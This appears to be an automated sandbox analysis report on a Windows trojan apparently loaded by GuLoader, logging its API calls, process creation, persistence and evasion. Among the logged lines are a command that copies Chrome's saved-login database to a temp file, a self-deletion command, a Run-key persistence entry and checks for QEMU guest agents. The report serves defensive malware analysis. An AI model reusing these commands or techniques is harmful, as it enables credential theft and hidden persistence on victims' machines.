        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_0056C88B NtAllocateVirtualMemory,LoadLibraryA,29_2_0056C88B
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_00563CE1 NtProtectVirtualMemory,29_2_00563CE1
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 29_2_00563E0E NtProtectVirtualMemory,29_2_00563E0E
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E902DC0 NtAdjustPrivilegesToken,LdrInitializeThunk,30_2_1E902DC0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E902D10 NtQuerySystemInformation,LdrInitializeThunk,30_2_1E902D10
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E902B90 NtFreeVirtualMemory,LdrInitializeThunk,30_2_1E902B90
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E902B10 NtAllocateVirtualMemory,LdrInitializeThunk,30_2_1E902B10
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E9034E0 NtCreateMutant,LdrInitializeThunk,30_2_1E9034E0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E902E80 NtCreateProcessEx,30_2_1E902E80
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E902EB0 NtProtectVirtualMemory,30_2_1E902EB0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E902ED0 NtResumeThread,30_2_1E902ED0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E902EC0 NtQuerySection,30_2_1E902EC0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E902E00 NtQueueApcThread,30_2_1E902E00
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E902E50 NtCreateSection,30_2_1E902E50
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E902FB0 NtSetValueKey,30_2_1E902FB0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E902F00 NtCreateFile,30_2_1E902F00
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E902F30 NtOpenDirectoryObject,30_2_1E902F30
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E903C90 NtOpenThread,30_2_1E903C90
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E902CD0 NtEnumerateKey,30_2_1E902CD0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E902CF0 NtDelayExecution,30_2_1E902CF0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E902C10 NtOpenProcess,30_2_1E902C10
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E903C30 NtOpenProcessToken,30_2_1E903C30
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E902C30 NtMapViewOfSection,30_2_1E902C30
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E902C20 NtSetInformationFile,30_2_1E902C20
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E902C50 NtUnmapViewOfSection,30_2_1E902C50
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E902DA0 NtReadVirtualMemory,30_2_1E902DA0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E902D50 NtWriteVirtualMemory,30_2_1E902D50
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E902A80 NtClose,30_2_1E902A80
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E902AA0 NtQueryInformationFile,30_2_1E902AA0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E902AC0 NtEnumerateValueKey,30_2_1E902AC0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E902A10 NtWriteFile,30_2_1E902A10
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E902B80 NtCreateKey,30_2_1E902B80
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E902BC0 NtQueryInformationToken,30_2_1E902BC0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E902BE0 NtQueryVirtualMemory,30_2_1E902BE0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E902B00 NtQueryValueKey,30_2_1E902B00
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E902B20 NtQueryInformationProcess,30_2_1E902B20
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E9038D0 NtGetContextThread,30_2_1E9038D0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E9029D0 NtWaitForSingleObject,30_2_1E9029D0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E9029F0 NtReadFile,30_2_1E9029F0
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E904570 NtSuspendThread,30_2_1E904570
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_1E904260 NtSetContextThread,30_2_1E904260
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_005723E2 NtProtectVirtualMemory,30_2_005723E2
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_0056C88B NtAllocateVirtualMemory,LoadLibraryA,30_2_0056C88B
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_00563CE1 NtProtectVirtualMemory,30_2_00563CE1
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeCode function: 30_2_00563E0E NtProtectVirtualMemory,30_2_00563E0E
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeProcess Stats: CPU usage > 98%
        Source: C:\Windows\explorer.exeProcess Stats: CPU usage > 98%
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeProcess Stats: CPU usage > 98%
        Source: Zr26f1rL6r.exe, 00000002.00000002.47311035451.0000000000422000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameUNDERWR.exe vs Zr26f1rL6r.exe
        Source: Zr26f1rL6r.exe, 0000000A.00000000.47306458832.0000000000422000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameUNDERWR.exe vs Zr26f1rL6r.exe
        Source: Zr26f1rL6r.exe, 0000000A.00000003.47933760701.00000000008E5000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs Zr26f1rL6r.exe
        Source: Zr26f1rL6r.exe, 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Zr26f1rL6r.exe
        Source: Zr26f1rL6r.exe, 0000000A.00000003.47933945787.00000000008FF000.00000004.00000001.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs Zr26f1rL6r.exe
        Source: Zr26f1rL6r.exe, 0000000A.00000002.47938539485.00000000000DC000.00000040.00020000.sdmpBinary or memory string: OriginalFilenameRUNDLL32.EXEj% vs Zr26f1rL6r.exe
        Source: Zr26f1rL6r.exe, 0000000A.00000002.47954454517.000000001EB60000.00000040.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Zr26f1rL6r.exe
        Source: Zr26f1rL6r.exeBinary or memory string: OriginalFilenameUNDERWR.exe vs Zr26f1rL6r.exe
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeSection loaded: edgegdi.dll
        Source: Zr26f1rL6r.exeStatic PE information: invalid certificate
        Source: Zr26f1rL6r.exeVirustotal: Detection: 40%
        Source: Zr26f1rL6r.exeReversingLabs: Detection: 20%
        Source: Zr26f1rL6r.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\Zr26f1rL6r.exe "C:\Users\user\Desktop\Zr26f1rL6r.exe"
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeProcess created: C:\Users\user\Desktop\Zr26f1rL6r.exe "C:\Users\user\Desktop\Zr26f1rL6r.exe"
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Zr26f1rL6r.exe"
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V
        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exe
        Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"
        Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeProcess created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeProcess created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeProcess created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe"
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeProcess created: C:\Users\user\Desktop\Zr26f1rL6r.exe "C:\Users\user\Desktop\Zr26f1rL6r.exe" Jump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeJump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe" Jump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe" Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Users\user\Desktop\Zr26f1rL6r.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /VJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe C:\Program Files\Mozilla Firefox\Firefox.exeJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeProcess created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeProcess created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe" Jump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeProcess created: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe "C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exe" Jump to behavior
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeFile created: C:\Users\user\AppData\Local\Temp\~DFBF74AAE9E8A330D2.TMPJump to behavior
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@24/6@68/14
        Source: C:\Windows\explorer.exeFile read: C:\Users\desktop.iniJump to behavior
        Source: C:\Windows\explorer.exeProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWOW64\rundll32.exe
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:424:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:304:WilStaging_02
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4948:120:WilError_03
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:424:304:WilStaging_02
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\SysWOW64\rundll32.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: Binary string: wntdll.pdbUGP source: Zr26f1rL6r.exe, 0000000A.00000002.47952232203.000000001E9BD000.00000040.00000001.sdmp, Zr26f1rL6r.exe, 0000000A.00000002.47950115070.000000001E890000.00000040.00000001.sdmp, rundll32.exe, 0000000F.00000002.51926935310.000000000445D000.00000040.00000001.sdmp, rundll32.exe, 0000000F.00000002.51925522665.0000000004330000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51545361964.000000001E9C0000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001C.00000002.51546766048.000000001EAED000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51672974108.000000001E9AD000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001D.00000002.51671672072.000000001E880000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51750821024.000000001E890000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51752294745.000000001E9BD000.00000040.00000001.sdmp
        Source: Binary string: wntdll.pdb source: c8ahotgz8h.exe, c8ahotgz8h.exe, 0000001E.00000002.51750821024.000000001E890000.00000040.00000001.sdmp, c8ahotgz8h.exe, 0000001E.00000002.51752294745.000000001E9BD000.00000040.00000001.sdmp
        Source: Binary string: rundll32.pdb source: Zr26f1rL6r.exe, 0000000A.00000002.47938438528.00000000000D0000.00000040.00020000.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47933760701.00000000008E5000.00000004.00000001.sdmp
        Source: Binary string: rundll32.pdbGCTL source: Zr26f1rL6r.exe, 0000000A.00000002.47938438528.00000000000D0000.00000040.00020000.sdmp, Zr26f1rL6r.exe, 0000000A.00000003.47933760701.00000000008E5000.00000004.00000001.sdmp

        Data Obfuscation:

        barindex
        Yara detected GuLoaderShow sources
        Source: Yara matchFile source: 0000001E.00000000.51287210518.0000000000560000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001B.00000002.51291049340.0000000002320000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000A.00000000.47309959760.0000000000560000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000002.00000002.47312005259.0000000002310000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001C.00000000.51076893477.0000000000560000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000016.00000002.51080501754.0000000002290000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001A.00000002.51208710920.0000000002290000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000000.51204349057.0000000000560000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001D.00000002.51661508770.0000000000560000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001C.00000002.51534694546.0000000000560000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000001E.00000002.51740663183.0000000000560000.00000040.00000001.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_004093B3 push ebx; ret 2_2_004093B4
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_02313800 push 4674B5B4h; retf 2_2_02313876
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_02312286 push esi; retf 2_2_02312228
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_02315814 pushfd ; retf 2_2_023158DE
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_02315814 push ebx; retf 2_2_02315A54
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_02313841 push 4674B5B4h; retf 2_2_02313876
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_02310047 push ds; ret 2_2_02310051
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_02310047 push ds; ret 2_2_023100B3
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_023138B3 push 4674B5B4h; retf 2_2_02313876
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_0231388E push 4674B5B4h; retf 2_2_02313876
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_023158DF pushfd ; retf 2_2_023158DE
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_023160C4 pushfd ; iretd 2_2_023160C7
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_023138CA push 4674B5B4h; retf 2_2_02313876
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_02315919 push ebx; retf 2_2_02315A54
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_02311918 push esi; ret 2_2_0231192F
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_0231010F push ds; ret 2_2_023100B3
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_0231590E pushfd ; retf 2_2_023158DE
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_0231597F push ebx; retf 2_2_02315A54
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_02312954 pushad ; ret 2_2_02312955
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_023159A2 push ebx; retf 2_2_02315A54
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_023159AE push ebx; retf 2_2_02315A54
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_02315996 push ebx; retf 2_2_02315A54
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_0231598A push ebx; retf 2_2_02315A54
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 2_2_02314DAC push ecx; ret 2_2_02314DAD
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_1E8C08CD push ecx; mov dword ptr [esp], ecx10_2_1E8C08D6
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_00573F15 push edi; ret 10_2_00573F18
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_00573F11 push edi; ret 10_2_00573F14
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_00573F1D push edi; ret 10_2_00573F20
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_00573F19 push edi; ret 10_2_00573F1C
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_00573F0D push edi; ret 10_2_00573F10
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeCode function: 10_2_00573F21 push edi; ret 10_2_00573F24
        Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\Grt4lhl\c8ahotgz8h.exeJump to dropped file
        Source: C:\Program Files\Mozilla Firefox\firefox.exeCode function: 25_2_000001BF400004B2 GetPrivateProfileSectionNamesW,GetPrivateProfileStringW,25_2_000001BF400004B2
        Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run YNULIT20Jump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run YNULIT20Jump to behavior

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Self deletion via cmd deleteShow sources
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: /c del "C:\Users\user\Desktop\Zr26f1rL6r.exe"
        Source: C:\Windows\SysWOW64\rundll32.exeProcess created: /c del "C:\Users\user\Desktop\Zr26f1rL6r.exe"Jump to behavior
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeProcess information set: NOOPENFILEERRORBOX

        Malware Analysis System Evasion:

        barindex
        Tries to detect Any.runShow sources
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Users\user\Desktop\Zr26f1rL6r.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exeJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeFile opened: C:\Program Files\qga\qga.exeJump to behavior
        Source: C:\Program Files (x86)\Grt4lhl\c8ahotgz8h.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
